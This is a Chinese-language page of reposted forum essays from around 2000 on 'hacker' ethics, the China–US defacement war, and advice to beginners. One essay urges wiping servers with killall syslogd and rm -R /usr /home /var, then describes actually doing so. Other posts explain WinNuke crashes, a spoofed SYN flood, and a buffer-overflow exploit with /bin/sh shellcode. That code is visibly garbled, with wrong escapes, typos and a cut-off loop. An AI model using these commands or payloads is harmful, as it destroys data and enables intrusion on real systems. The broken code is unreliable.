我在一本很老的书《Hack Endless》2.0上看到的几篇文章很不错

 <script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/468x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_2.htm&val1=50624"></script> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=6&source=ad4all_50624" frameborder="0" width="120" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=19&source=ad4all_50624" frameborder="0" width="580" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=3&source=ad4all_50624" frameborder="0" width="750" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=18&source=ad4all_50624" frameborder="0" width="775" scrolling="no" height="80"><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_3.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_3.htm&val1=50624"></script> 悲哀的黑客大战 几天来走了很多国内知名的论坛，对于这次的"黑客大战"可谓一个热门话题，各种意见都有，赞成的，不赞成的，乱起哄的，互相对骂的，令人笑破肚子的，真是五花八门，看看网页也有4天没有更新了，以次充充数，汇报我的观后感同时也说说我的一些观点： 1.首先这次话题之所以会叫"黑客大战"，其实是各个媒体对"黑客"这个词的侮辱，在我看来，一个真正的黑客是为了网络而生存，他的最高宗旨是获得一切他想在网上获得的东西。而不是单单的利用所懂得的技术去炫耀。技术永远是黑客心中的第一，黑客永远是走在技术尖端的人，永远追求最高和最尖端的技术并达到狂热的程度，才能被人称为黑客，黑客是别人给的评价，而不是自封的。 不过这些人大多数时事不敏感，对政治毫无兴趣，这些被称之为黑客的人，当然有入侵一部普通服务器的能力，而且是小菜一碟，一击必中。但是不是你能入侵一部主机，你就叫做黑客了呢？差得远了，现在的入侵已经非常的容易，漏洞已由别人发现了，利用这个漏洞进行入侵的代码也由别人写出来了，你所做的只是填上目标的IP，做个写上你大名的叶面这么简单，比起使用word来编辑一编文档还简单。而这次进行着这样的"义举"人，不管中国与美国，大多数都是这样的情况，所以这些人都不配叫做黑客 2.这次的大战，其实并不大，非常的小，水平极低，不管中国或美国，几乎所有可以称得上黑客的人都没有参加，就中国来说这些人现在不是在睡大觉就是在度假，有些还继续在和美国的程序员探讨技术问题，聊得正欢。只剩下那些所谓的红客用着大多数乃美国人发现的漏洞，大多数乃美国人编写的核心代码的所谓黑客工具，在干着会用win98就会做的入侵壮举。其水平之低我举两个例子说明，第一，竟然想出使用炸邮箱的方法来炸白宫的邮箱，现在我们就拿我的邮箱来试验一下好不好，你尽管炸我这个邮箱netdemon@20cn.com，我保证我一样可以得到我要得到朋友给我的来信，删掉你给我的垃圾。我都能办到，白宫的技术人员有什么理由办不到？第二，这个就确实令人笑破肚皮了，竟然认为同时一起来ping一个IP就叫做DDOS攻击，大量的人来浏览一个网站能让它瘫痪，还互相通告说"白宫慢了啊~~~~"，天那，国内的出口有多大？这么多人一起来排队出国去ping，不慢才怪阿，一个设置完善的服务器，绝对不会因为大量的浏览而瘫痪，就apache来说，其默认的httpd.conf，就已经足以保证不会因为请求过多而把整个服务器的资源耗尽。你也不看看人家美国的带宽，在白宫还没有瘫痪的时候，我们国内的路由器都给你搞瘫痪了啦！ 3.各方都只是为了出名而搞出这次的所谓51行动，各个媒体当然是有热闹就凑，到现在我没有见过那个被黑的美国网站被换上的主页是没有留下其组织名称还有做此"义举"的"黑客"的名字的，相反，被黑的国内网站倒是有一小部分是没有留下什么的，这也难怪，因为中国被黑的多，就有某些不大一样的啦。当然了，每个人都不会拒绝出名，包括我在内，我搞了这个网站，如果一点名气没有，每天的access_log里面就只有我的IP，我也会觉得没意思，所以，当有些成员说如果他黑了美国的站，能不能留下20cn的名称的时候我说可以，为什么可以？一半是因为我曾经在某个论坛说黑了美国也没什么意义而被某些人骂了个狗血临头，说我这样说是卖国贼，另一半是因为我也想20CN还有成员网站都能出名，还有就是可以让一些大家实践实践，这样一箭三雕的事何乐而不为呢？尽管我并不想这样做，不过我却也好像只能用这种方法来证明自己不是卖国贼了，想想也真是好笑，不过幸好我们不是黑客，这么做倒也无所谓，何况我们也并不是留下FUCK USA这样会让人觉得毫无素质的话来给自己和中国同胞丢脸 4.换个主页美国有何损失？不外乎就是人家的网管就换回来，还发现了这个不安全的地方，修复了，而你就到处汇报你的战绩，让那些一点不懂的人对你说，你好棒吧，我好崇拜你啊，满足一下你的虚荣心，我这几天也不知打了多少次这句话，因为老是有人通过QQ给我一个IP地址或域名，我只好用这句话来回答了事，谁知道却有一个人的回复让我真的把喝在嘴里的茶喷了出来，他说"你想不想学啊，如果你把你的QQ号码给我，我就教你"。哎~~~~~~，确实，换个主页写上你自己的观点，也许可以泻泻愤，解解气，好爽。是吧？可是你有没有想想，你现在用的操作系统谁写的？你现在用的电脑的芯片是那个公司的？你在用的那个程序的核心代码谁写的？你在利用的漏洞谁发现的？最糟糕的就是电讯局那个让你可你连到美国的路由器它还要是Make in USA的，你在这样的东西上做着你的黑美春秋大梦你不觉得惭愧？火药是我们的祖先发明的，拿来当烟花用的，洋鬼子学了去变成武器打我们，现在你们是不是已经把人家的"火药"变成自己的"武器"了呢？王伟的生命并没有回来，但美国人却打来了，网络战争开始啦~~~~~~~，既然叫做战争，我们就不用管什么道德，什么黑客精神，什么我用的那东西是谁的了，我的目的只有一个，就是让对方有所损失，可你这样改个主页对方有什么损失？最起码也要这样 #killall syslogd #cd / #rm -R /usr #rm -R /home #rm -R /var 这样一来页面啊，用户资料啊，数据库啊包括含有你IP的log之类的什么都没了，高兴的话再来个shutdown -h now 这样才有用嘛，坦白说，这样的事在我看到一个中国被黑的网站上留下的话之后很气愤干过，但是当我重复了3回这样的命令之后我开始冷静了就觉得不对劲，因为这好象和这样的情况类似：如果你是四川人，你在广东的时候打了我，而我就跑到四川随便找了个四川人揍了一顿，冤有头债有主嘛，所以我再去看那个被黑的叶面，想找他的网站的联接，谁知道他那里却啥也没有，就只有个名字，这时我又想，其实王伟是给那24个美国飞行员给害的，应该跟他们算帐才对，但是，他们又好像是听命于布什的，那么我应该身绑炸药，找到布什和他同归于尽才叫精忠报国啊，可是就算我有那高尚情操，我也没那能耐，只好作罢，断下线，继续写我的程序。 5.据说，美国黑掉中国的站点比中国黑掉美国的多6倍。其实被黑美国网站的数量应该是可以多一点的，因为有某些不露名的人同样在干着黑美的事，我所认识的就有两个，他们干掉的站很少，但都是一些有难度的，重点的，遗憾的是他们不是改网页因为那主机上也根本没有主页可以让他们改，而是破坏某些他们不肯告诉我、就算告诉我我或者也不知道是啥的东西，所以他们也就没法向各位红客汇报他们的成果咯，而且他们根本就不会说，因为他们都是小有名气的人啦，出了名就不好意思人别人知道他竟然也做这事了而且他们还都有美国那边的同样搞技术的朋友，给人家知道多不好啊，不过奇怪，尽管我比较偏向黑了没意义，而他们就认为不仅要而且还要来狠的，但我们好像也互相尊重对方，他认为要黑那就去黑咯，我觉得黑了没啥用那我不就不黑咯，有什么好争的呢？但看看某些论坛，竟然争得各自连对方的妈妈都请出来了，我真的很难接受这样的人他就具有崇高的爱国精神？就算有，也没比我高多少吧？尽管我认为这个方式来黑美国没意义。当然，美国黑我们也不见得有意义，更没意义。 6.说到这里，总觉一下，然后睡觉。有句话说得好，如果有人打了我一拳，那么，我一定要打他两拳，但如果我现在打不过你，那么，我只好到深山老林苦练，等我的九阴真经练成了，我一定要找你报仇。所以，奉劝各位红客，想个法子收拾残局吧，这场战争的结局非常明显，你再黑多一些，人家就更多一些，还是尽量想法挽回点面子吧 ，对于各个现在还在扫描的朋友我劝你一句"阿尼托佛，网海无边，回头是岸"，而各个一知半解，认为ping就是DDOS攻击，却也跃跃欲试的朋友我就送你一句名言"好好学习，天天向上"，如果实在是听不进我的话，我只好再送你一句"主啊，愿上帝保佑你，啊们" 说明：这篇文章中含有许多攻击他人的言语，在此我向他们表示歉意，有些论调和观点我本人也是不赞同的。尤其是对我的朋友孤独剑客，希望他们能够明白。推荐给大家的目的是想端正我和大家的学习目的。希望我们大家能够一起提高，不仅是技术！ 以下是某论坛上BBS的帖子 《这些无聊的人！！！》 从来不到WEB BBS，只不过听说绿色兵团好象是国内的安全名站，来看看了，竟然都是一些垃圾！从未见过真正的HACKER在WEB BBS里高谈阔论，你们有什么意思，冒冲BIGMAN骗骗那些从未见过真正世面的新手 罢了，现在看来，我对中国网站还是不了解，每个“HACKER“WEB SITE都是一样的教程，COOLFIRE的教程还放在自己的网页上，呵呵，也不嫌丢人。还有现在大量的HACK工具，有用的有几个，真正能让新手马上攻击一个站点的工具有吗？那些垃圾只不过是对PC的攻击效率比较高罢了，WHY？PC谁会把自己的机器搞的跟服务器一样？放个防火墙？比你的机器不知道贵多少倍了，什么IPHACKER，CHINABOY，流光。。。。。。。一群垃圾，有什么用？IPHACKER，不知道对方的IP，什么也不管用，只能看自己的IP，还不如WINIPCFG OR IPCONFIG来得快，CHINABOY说的好听成功率90%以上，我看10%以下才是真的，现在网上报的那些已被攻击的日本IP，殊不知，早已经开好了SERVER了，等着那些用傻瓜工具的人来HACK呢，真不知道你们是怎么想的？？？做一名在WEBBBS上的”HACKER“很过瘾？是不是能多收点EMAIL？无聊的很呀！ 　以下是本人的意见（无关人员最好别看） 　对孤独剑客和小蓉的个人意见： 　为什么只对你们两个说，因为我看到到处都有你们的大名呀，下载了几个，分析了一下，呵呵，不好意思，真是太烂了，仿造一些已经有的工具，然后用什么给它汉化的？可以问一下吗？IPHACKER，让孤独剑客你自己说，有什么用？一个微软操作系统的漏洞，你竟然把它搞的这么夸张，真的那么有效吗？大不了修改注册表就好了，ONLYONE MESSAGE！在NT下，只要装SP4的就可以有效的防住了，你去找找现在哪个WEB SERVER还在用WINNT+SP4。X以下的？？？还有CHINABOY，简直是骗人的东西，垃圾而已，有你那样设计程式流程的吗？是不是计算机外行呀？ CHINABOY这个东西不瞒你说，是我见过的最赖的程式，有空进修一下编程吧，CHINBOY也就对一些P166的机器管用！你还在大肆宣扬这个东西，知不知道，用你的程式，对传输速度要求很高，国内能达到你要求的，大部分都是公司或一些机构的上网地方，你难道不知道如果对方可以通过你的程式对进攻者了解的一清二楚吗？你这岂不是害大家吗？有你这样搞的吗？赶快把你的程式改一下吧，别没让大家把你当成大侠，到成了汉奸了！（如果你是中国人，不要生气） 　　小蓉的软件呵呵，不说大概你心里也明白，超级COPY，不过也难得，把它给搞上网了，对你的程式，你最好看看源码，如果你确认参数传递无误，呵呵，恭喜你，别人用你的东西，肯定会出现问题，而且不止这一个，难怪有人骂你，下次记得先出个A。。。OR B。。。。等等的实验版本，要不对抱歉,其实我只是对这些只能在web上"大显身手"的所谓的"hacker高手"感到十分厌烦,他们充其量只是从国外的HACK WEBSIT上看了那么一点点"新"技术&"新"漏洞,然后把这些东西又放在了自己做的WEBPAGE上,他们也许只是把那些在国外的东西,"洋为中用"的汉化一下罢了! 在我而言,我看了几次大家写的BBS上的贴子,对那些渴望成为HACKER的新入门的人来说,我是很敬佩的,因为他们至少还有梦想,而那些"HACKER 高手"却只能在别人那里COPY EVERYTHING,不过他们的网站也确实对那些新人来说是一种诱惑,夸张的告诉大家HACKER是多么的伟大多么的神秘,殊不知,那些整日在电脑面前 敲着键盘,旁边食品垃圾和资料堆放的人,有多少人整日在WEBBBS上回答各种各样的"奇怪"(只能说是奇怪了,因为有的根本就不能回答)的问题?还要争取进去TOP10. 对新手来说最重要的是把最基本的原始文档看明白,要把这些东西都变成自己的!教程就那么神奇?给你写一篇教程,你就马上能进攻靖国神社?不要在迷恋教程了,真正的教程决不会简单的只有数十页,它会从最最原始的文献给你讲起,对新手来说,如果你智商平常,可能要花4年的时间来学习教程,你有这个时间吗?即使你用4年时间学会了这些东西,但那时你会知道这4年来又出了什么新东西吗?还是赶不上!这难道是为什么少年HACKER增多的原因??呵呵(本BBS只能回复16KB的东西)只好换页了! HACKER这个名词也许对大家来讲真的很有诱惑,但真正做到能以HACKER自居的能有几人?不说他要学的东西包罗万象,就是为他耗费的时间也足已让你望而却步,你能在不用特殊工具的情况下连续猜解一个PASSWORD长达16个小时吗?你能够熟练的运用你所知的编程语言,看到猎物原码中的BUG吗?你能对一个从不知的程序身上,通过编者所写的原码中,认出这是谁的大作吗?你能一星期内连续攻击某个站点,而且能保持旺盛的战斗力吗?你能在黑暗和混杂着烟草味的小屋里,为实现自己心中的理想而对其他不管不问吗?我想能做到上述所说的,可能没有几人,这并不是作HACKER的必须原则,但是我想每一个对这项"工作"(没有好的词语来形容)狂热的人来说,遇到上述情况,可谓是家常便饭!还有一点最重要,那就是你能做到攻击成功后,你能压抑住自己内心万马奔腾般的喜悦转手去做其它的事情,并且还会对自己提出更高的要求,这就是我为什么讨厌在WEBBBS上高谈阔论的所谓"HACKER高手"的原因之一,他们总是做出一定点成绩就会让世界上每一个能知道的人都知道了,就象孤独剑客&小蓉的程式一样,如果他们能把那些程式多保留几个月,做一下自 我测试,或是让别人代为测试的话,就不会出现那么多BUG了,很显然这是新手的做法.看看那些著名的HAKCER工具有那个发表以后,会吧它的后续版本作为BUGPATH来发布?呵呵,真让人感到为这些程式惋惜!新手完全可以从抛弃WEBPAGE上所讲的那些漏洞,教程,攻击手段......,既然大家都写出来了,WEBMASTER也能发现,那你知道的那些漏洞确实是没用了,教程写的再简单不过了,但其中的术语你还是没弄明白,有很多其他的地方可以进行交流的,在某些服务器上,你可以登陆上去,去看看大家正在处理的问题,试着和其他人交流一下,或许你会被哪个资深的HACKER看中,选为关门弟子呢.呵呵,这个想法太好玩了!经常去一些你知道的SITE,或许他们会让你缴纳会费,不要在乎那些小钱,实现你心中梦寐以求的理想比什么都值钱.但是最重要的是你要把自己的基本功打好,不能总靠着那些HACKER工具来进行攻击,或许你拿到了一个很强大的HACK工具,找到了ROOT OR ADMINISTORTRA的密码档,但是你如果对这个系统部了解,你能做什么???你什么也不能做!可悲!多学东西是你未来战斗的资本,而练习确是你成功的法宝,多动手,对一些自己不明了得东西多动手,你会为此得到相应的报酬!动手是每个新手成功的捷径,只有这样你才不至于进入服务器时,由于自己花了长时间在服务器上试验,而惨遭...在我看来(仅仅是个人意见,不值得考虑),很多新手都被大陆的一些HACK WEBPAGE给欺骗了,一个小小的操作系统的错误能够专门为之写出个程式,并且竟然有好多版本!一篇小小的教程几乎出现在了每一个WEBPAGE的HACK教程里面.其实那些东西对你只能是进攻参考的东西,没有实用价值的.曾经和一些大陆以外的华人交流,他们对大陆新兴起的这股HACK暴风给与了很高的赞赏,他们有时会为了自己成员的缺少而感到遗憾,但是他们对大陆那些教授HACK知识的方法却感到惊讶和鄙视,他们中有人说,世界上最强大的HACKER军团或许救在中国大陆,因为他们可以发动起成千成万的人,对一个站点进行最简单技术手段但却规模巨大的攻击,只到他们自己没兴趣或已经攻击成功!这充分体现了中国大陆还是没有把计划生育搞好!当时我听了以后很气忿,但是我没有什么话可讲,对方是MY的地下HACKER组织的杰出领袖,而我在CN都不出名,没有资格的.但是我强烈的感到自己尊严的丧失!没办法,一个人的力量是有限的!在大陆以外的地区有很多很好的SITE提供很好的HACKER服务,你可以在那里得到自己想知道的东西,但是不要问他们象"WINNUKE2.0怎么用"类似的问题,问了也没人答理你,你的E问好的话可以去一些E文的HACKER GROUP的聚集地,在那里你只要不发表言论,不会有人赶你走的,除非他们要进行什么活动.在台湾地区,我所知的几个人他们对程式的研究很着迷,他们可以把新发布的WIN2000原码中的漏洞花上几个星期的时间找出来,并且从中提取劳动报酬,你能把一个WIN95反编译回去,并且找出为什么NUKE程序能够这么轻松的攻击吗?说实在的,做一个HACKER真的很难,你要学的 知识要比你想要攻击的地方的WEBMASTER多的多,你要成功的发现他没有发现的东西,从而达到自己的目标!!!不写了,太累!这只是我近几天来看大陆一些HACK 名站的得到的一些... 很希望每个新手能够在不断的努力当中成就一番光辉! 回答独狼的问题: 这么说你是高手了，那你为什么不帮帮我们这些低手呢？技术保密？为了维持你那神秘的面纱？ 首先我不否认我是高手,那是相对而言的,如果我的数学水平已经让我可以计算方程式的话,我对于一个还不认识阿拉伯数字的孩童来说,我就是上帝! 其次我可以帮你,但是只能帮你们走入那对你们来说神秘的空间,一切只能靠自己的努力来完成. HACKER向来就是FREE的通译,真正的HACKER不会把自己所知道的深埋地底! 从来就没有什么神秘面纱,你也很神秘呀,我不知道你的姓名,婚否,年龄,工资收入情况,还有家庭地址,住宅电话......对我和其他人来言,你很神秘!!! 对进来利用大家对日气忿不平心理进行个人宣扬和xxxx的人鄙视!!! 作者: csjianglan 发布日期: 2007-5-03 会在本BBS呆三天,今天是第2天 　　　　　　　　　　 　　　　　　　　　　　　　MASTERLE 　　　　　　　　　　　　　2000.2.8 对感兴趣和有想向这方面发展的同志的忠告： 　　真正的大家所谓的HACKER不会在某个WEB BBS上跟人家写好多好多东西，也不会在BBS上争第一名，如果你想作一个真的电脑强者，那么现在去找点东西看吧，UNXI WIN 这些东西最好能搞明白！另外最好把所有从机器里出来的东西都看懂！这样你最少能知道你攻击的时候出现什么异常情况！ 　如果你只想在聊天室或IRC里把别人踢下去，并且还想让你的对手佩服你！ 那你就去下载大量的HACKER工具，自己慢慢玩吧，很傻瓜的！ 　　　　　　　 一个看不过去的中国人！ 我想说》 当我们谈到网络安全的时候,就经常可以跟一个词联系到一起,那就是黑客。其实，印象中的黑客是带有偏颇的感情色彩的，比较明确的说法是叫入侵者。黑客跟入侵者有什么区别呢？黑客，指对于任何计算机操作系统的奥秘都有强烈兴趣的人．”黑客”大都是程序员，他们具有操作系统和编程语言方面的高级知 识，知道系统中的漏洞及其原因所在：他们不断追求更深的知识，并公开他们的发现，与其他人分享；并且没有破坏数据的企图． 入侵者，是指怀着不良企图，闯入甚至破坏远程机器系统完整性的人．”入侵者”利用获得的非法访问权，破坏重要数据，拒绝合法服务器的请求，或为了自己的目的制造麻烦．”入侵者”很容易识别，因为他们的行为是恶意的． 虽然这才是黑客和入侵者的确切含义，但是在我们的日常生活中，人们在讨论到”黑客”这个字眼的时候，还是带有强烈的贬义色彩，或者说我们大家都把黑客跟入侵者联系到了一起，其实黑客中既包括善意的真正的黑客，也包括恶意的入侵者，对于这些区别，大家只要心里有数就OK拉　 大家如果还不是太明白黑客和入侵者之间到底有什么本质性的区别,可以在黄金书屋下载一本<<黑客电脑时代的牛仔>>看看,虽然技术性不是很强,但是却大致描述了黑客产生和发展的过程,书中的一些观点和理论虽不能让人信服但是却能让人产生遐想,或许你看了之后会明白. 至于成立黑客组织,呵呵,我想如果你能大张旗鼓的明打出旗号,只要自己控制的好,国家肯定不会对你怎么样,要知道初期的黑客是推动计算机向前发展的一个动力. 在我的思想中,所有东西一出来肯定有缺陷,黑客会把这个新生的事物仔细研究,然后会通过与之接触找到它不完美的地方,黑客就像是个理想的完美主义者,他会很讨厌有缺陷的东西,并且能够凭着天性找到某些东西的不完美之处,并且把这个不完美之处填补,或许你不明白为什么那么多人相当黑客,是他们心中美好的愿望和理想驱使他们可以废寝忘食可以不知疲倦可以忘乎所以可以不顾一切的追求心中的完美境界,在本BBS的各位同仁,谁有这种想法?如果你有,那么你就要为之奋斗,要做到刚出监狱就会投身到自己喜爱的工作中去(j)!!! 至于有位同仁所言,前些天刚枪毙两个黑客,我想他大概是糊涂了并不是只要能侵入系统的人都是黑客,如果那样,黑客们早天下成群了,我希望黑客天下成群的那一天,但不希望是现在. 关于这个bbs我没有说办得不好,也不会说办得不好,我只是对大家在这里埋头苦等感到惋惜,每天等着一些所谓的黑客高手宣布他们的研究新成果(或许是刚翻译过来的文章),然后自己迫不及待的试一把,也许那些高手们已经把这个东西试验了几百遍了,你难道只能在这里学到东西吗?学校里的所有课程你都学会了吗?你在上大学时也许学过C BASIC .....但是我现在对你说,我想要一个能让系统瘫痪的小程序,而且不要超过500K的话,你能做到吗?你能熟练的做到吗?黑客其实是一种荣誉的象征,他在现实生活中也许是个弱者,甚至是个残疾,也许是个女人,小孩,但是只要他的双手接触到键盘,他坐在电脑面前,那时整个世界就属于他了,他是电脑领域的强者.向往吗? 网络上的学习固然是好,不错,我也喜欢上网,但是你要知道,你可以从网上知道的东西,究竟有多少价值,一本<>竟然有10M,还不如花钱买一本呢,再说网络上有多少能够把你带到更深层领域的教程?有多少能够手把手把你从无知培养成出类拔萃的教程?不是说网络学习不好,只不过大家都有误区罢了,以为在网上看到一些漏洞,赶紧试验一下,成功了确实很爽,但是你能知道你为什么成功吗?你的基础是否有足够的资本看懂网络上别人贴出来贴子中提到的术语? 也许我的观点不会得到大家的认可,但是我还是想说出来,基础不是能从网上学来的是靠自己努力的来的,网上交流的是经验,不是教程,但是这个BBS确实没有太多的值得我们借鉴的经验,我的到来确实给这个清静的地方带来了波动,我想这里还算可以,贴子帖的那么多,人气也旺,很好,大家可以互相交往,不必隐姓埋名,我只是这几天过年,为了凑个热闹,想来放松一下,本来没有节假日的(谁听说过黑客有节假日?),我只是想来这里转转,看看那些贴子,找找当年的冲动和激情,一边能够更好的投入"工作",继而看到某些"不法分子"竟然利用大家心中美好愿望做一些不太好的事情,这其实是一种对...... 我激动的留了几条发言,呵呵,谁知收不住手了,我应该只待一天的,没想到惹得大家这么生气,但是我一向说话算话,3天我也快熬过去了,很抱歉,我带给大家的不愉快,本想找几个高手切磋一些,或是带几个新手,呵呵,但是我发现这里还是不安全,不是一个"公共场所".劝大家学习大部分应该靠自己的努力太累了,这三天打的汉字比我半年打的都多!另外鹰鹰既然知道我是河南的,来找哦,能找到才算是好本事,信箱你一定也能看到了,找我信箱里的东西,然后会发现一些好东西的!!! 　　　　　　　　　　　　最近比较烦,甭理我! 　　　　　　　　　　　　　 2000.02.09 孤独剑客请看: 一个攻击windows的方法是用OOB方式通过TCP/IP Port 139向对端的Windows/NT传送0字节的数据包,很容易就能把windows/NT当机.如Windock程序,WinNuck程序(该程序只有9行),准确率几乎是100% 解决的方法是: 运行regedit: find [HKEY_LOCAL_MACHINE/Systerm/CurrentControlSet/Services/VxD/MSTCP]; 加上一行"BSDUrgent"="0" WIN98也一样可以用"炸弹"攻击,Winnuke的升级版本Pnuke,就可以轻松的攻击win98,解决方法同理. 这就是孤独剑客的iphacker的攻击原理和防范方法,只是一般用户接触这些比较少罢了,其实很简单,只要你学包会! 下面是给小蓉看的一段代码: xiaoronglook.c ---------------------------------------------------------------------- void main(){ _asm_(" 　　　 jmp　 0x1f 　　　 popl　%esi 　　　 movl　%esi,0x8(%esi) 　　　 xorl　%eax,%eax 　　　 movb　$0xb,%al 　　　 movl　%esi,%ebx 　　　 leal　0x8(%esi),%ecx 　　　 int　 $0x80 　　　 xorl　%ebx,%ebx 　　　 movl　%ebx,%eax 　　　 inc　 %eax 　　　 int　 $0x80 　　　 call　-0x24 　　　 .string/"/bin?sh/" 　　　 "); 　　　 } 　　　 小蓉可以看看,如果看懂了,相信会让你的程序更加优秀至于这段程序是干什么用的,相信如果你能看懂,就会知道它的用处了,如果没有结论,那我就没办法,多研究一下你的程序和别人的差距吧! 至于大家都比较关心的伪装ip的方法,我到是有个方法,大家看看了IP Spoofing是一个攻击器(不要告诉我你没听说过)它是通过向主机发送IP包来攻击的,攻击过程是这样的: (1)攻击端-->SYN(伪造的自己的地址)-->被攻击端 (2)伪造的地址<--SYN-ACK<--被攻击端 (3)被攻击端等待回答. 一个简单的SYN attack攻击方法就是利用NetXRay软件首先产生一个正常的SYN attack,再把那个SYN attack修改一下,找出关于souce IP的那个offset,修改成任意的IP,然后找出关于校验和的地址,把校验和改好,然后把包拷贝起来,用NetXRay的发送包工具,一秒钟给他送几千个SYN attack到对方,可以让对方机器瘫痪没有再接送别人连接请求的能力.我想这种方法虽然比较麻烦但是绝对比"中国男孩"攻击有效的多,如果CHINABOY的攻击成功率能达到90%以上的话,我想这种方法能达到120%(呵呵,是夸张了一点) 在一个IP包的IP选项域中,有两类的"原搜索"(source routing)功能项可以选择: (1)LSRR (loose soutce & record routing)自由源和记录路径 (2)SSRR (strict soutce & record routing)精确源和记录路径 设计这个功能是为了方便网络故障调测的需要.当一台主机收到包含ISRR或者SSRR包后,他会把这个包中含有的目的地址读出来,并直接把这个包送往目的地址.这样就可能产生危险. 比如你用防火墙系统来保护你自己的企业内部不受干扰.正常的时候,所有的数据包的进出都在防火墙的控制之下,如 果你的防火墙要是允许调测包,那么外部网的攻击者就可以简单的发送调测包从外部网络送到内部网,从而逃避了防 火墙的监控.这里本来想介绍一下伪装自己的IP呢,但是想一想还是别懒写写东西吧 写了这么点东西,或许有些同仁看不懂,看不懂不要紧,只要抓紧时间学习基础知识,再加上自己的努力,相信你很快就会成为高手的,呵呵!! 实在懒的写了,问题不会解答! 今天是第三天了! 　　　　　　　　 MASTERLE 　　　　　　　　2000.02.09 我在“我想对孤独剑客和小榕说.......(想伪装ip的也可以来了)”这篇帖子当中引用了一端代码，有人让我看“hhtp;//www.isbase.com/book/showQueryL.asp?libID=32”所写的东西，我实在搞不懂是我理解能力差还是他理解错了，没办法，我只好写出那段代码产生的过程！ 首先介绍给大家也许都知道的攻击手段： 缓冲区溢出（buffer overflow)是一种系统攻击的手段，通过往程序的缓冲区写入超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它的命令，以达到攻击的目的。之所以缓冲区溢出可以实现的原因是系统程序没有检测用户输入的参数，也就是没有检测变量的长度是否符合要求。 eg1: -------------------------------------------- void function(char*str){ 　　　char buffer[16] 　　　strcpy(buffer,str); 　　} -------------------------------------------- 上面的strcpy()将直接把str中的内容copy到buffer中。这样只要str的长度大于16，就会造成buffer的溢出，使程序出错。存在像strcpy（）这样的标准函数还有strcat（）、sprintf（）、vsprintf（）、gets（）、scanf（），以及在循环内的getc（）、fgetc（）、getchat（）等。 当然，随便向缓冲区里填写东西造成它溢出一般只会出现“Segmentation fault"段错误，而不能达到攻击的目的。最常见的手段是通过某个特殊的程序的缓冲区溢出而执行一个shell，通过shell的权限可以执行高级的命令。如果这个特殊的程序属于root且具有suid权限的话，攻击成功就可能获得一个具有root权限的shell，就可以对系统为所欲为了（如果你基础不好，即使作到了这一步，你想，你会干什么？你能干什么？）。 一个程序在内存中通常分为程序段，数据段和堆栈3部分。程序段里面放着程序的机器码和只读数据。数据段放的是程序中的静态数据。动态数据则通过堆栈来存放。在内存中，它们的位置是从内存低端到内存高端分别是： 程序段、数据段、堆栈 当程序中发生函数调用时，计算机做以下操作：首先把参数压入堆栈：然后保存命令寄存器（IP）中的内容作为返回地址（RET）；第三个放入堆栈的是基址寄存器（FP）；然后把当前的堆栈指针（SP）拷贝到FP，作为新的基地址；最后为本地变量留出一定空间，把SP减去适当数值。 eg2: ------------------------------------------- void function(char*str){ 　　 char buffer[16]; 　　 ctrcpy(buffer,str); 　　 } 　　 void main(){ 　　 char large_string[256]; 　　 int i; 　　 for(i=0;i<255;i++) 　　　large_string[1]=‘A‘; 　　　function(large_string); 　　 } --------------------------------------------- 当调用函数function（）的时候，堆栈的情况如下所示： 内存低端　buffer sfp　ret　*str　内存高端 <-------[　　　][　 ][　][　　 ]-------------> 栈顶　　　　　　　　　　　　　　　栈底 上面的程序执行的结果是“Segmentation fault （core dumped）”或类似的出错信息。因为从buffer开始的256个字节都将被*str的内容‘A‘覆盖，包括stp、ret,甚至是*str。‘A‘的十六进制值为0x41，所以函数的返回地址变成了0x4141414141,这超出了程序的地址空间，所以出现段错误。 然而这样仍然达不到我们想要得结果，我们必须在溢出的缓冲区中写入我们想执行的代码，再覆盖返回地址（ret）的内容，使它指向缓冲区开头，就可以达到运行其他命令的目的 eg3这就是我帖在“ 我想对孤独剑客和小榕说.......(想伪装ip的也可以来了)　- masterle 00-2-9 11:22:17 ”的那段代码) ---------------------------------------------------------------------- void main(){ _asm_(" 　　　 jmp　 0x1f 　　　 popl　%esi 　　　 movl　%esi,0x8(%esi) 　　　 xorl　%eax,%eax 　　　 movb　$0xb,%al 　　　 movl　%esi,%ebx 　　　 leal　0x8(%esi),%ecx 　　　 int　 $0x80 　　　 xorl　%ebx,%ebx 　　　 movl　%ebx,%eax 　　　 inc　 %eax 　　　 int　 $0x80 　　　 call　-0x24 　　　 .string/"/bin?sh/" 　　　 "); 　　　 } ---------------------------------------------------------------------- 将上面的程序用机器码表示即可以得到以下十六进制shell代码字符串。 如下： ---------------------------------------------------------------------- char shellcode[]= "/xeb/x1f/x5e/x89/x76/x08/x31/xc0/x88/x46/x07/x89/x46/x0c/xb0/x0b" "/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80/x31/xdb/x89/xd8/x40/xdc" "/x80/xe0/xdc/xff/xff/xff/bin/sh"; char large_string[128]; void main(){ char buffer[96]; int　i; long *long_ptr=(long *)large_string; for(i=0;i<32;i++) *(long_ptr+i)=(int)buffer; for(i=0;i 　 large_string=shellcode; strcpy(buffer,large_string); } ---------------------------------------------------------------------- 这个程序所做的是，在large_string中填入buffer的地址，并把shell代码放到large_string的前面部分，然后将large_string拷贝到buffer中，造成它溢出，使返回地址变为buffer，而buffer的内容是shell代码，这样当程序试从strcpy（）中返回的时候，就会转而执行shell。 其实最头疼的是如何知道缓冲区的地址，并在那里放shell代码到large_string的前面部分呢？由于每个程序的堆栈启始地址是固定的，所以自然可以利用反复重试缓冲区相对于堆栈起始位置的距离来得到。但是这样的盲目猜测可能要进行上千次，实际上是不现实的。（手疼！！！！）解决的办法是利用空指令 